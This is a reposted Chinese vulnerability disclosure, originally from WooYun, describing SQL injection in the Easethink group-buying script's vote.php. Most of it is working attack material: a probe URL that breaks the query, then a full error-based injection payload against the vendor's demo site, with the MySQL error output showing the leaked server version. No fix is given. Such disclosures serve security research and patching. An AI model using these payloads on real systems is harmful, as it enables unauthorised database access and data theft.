网站地图    收藏   

主页 > 后端 > 网站安全 >

易想团购SQL注射漏洞 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 会记录cookie ,请求一次清除一下cookie。http://demo.easethink.com/vote.php?act=dovotename[a%27][111]=aaMySQL server error report:Array ( [0] = Array ( [message] = MySQL Query Error......

会记录cookie ,请求一次清除一下cookie。
http://demo.easethink.com/vote.php?act=dovote&name[a%27][111]=aa
 
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = a\' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ) [3] => Array ( [errno] => 1064 ) )
 
 
利用直接暴错方式注入 www.2cto.com
 
漏洞证明:http://demo.easethink.com/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa
 
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select * from t_vote_result where name = 'aa' and vote_id = 0 and vote_ask_id = 1 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# ) [2] => Array ( [error] => Duplicate entry '|5.1.48|1' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )

修复方案:您懂得!
 
 
作者kobin97@乌云

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论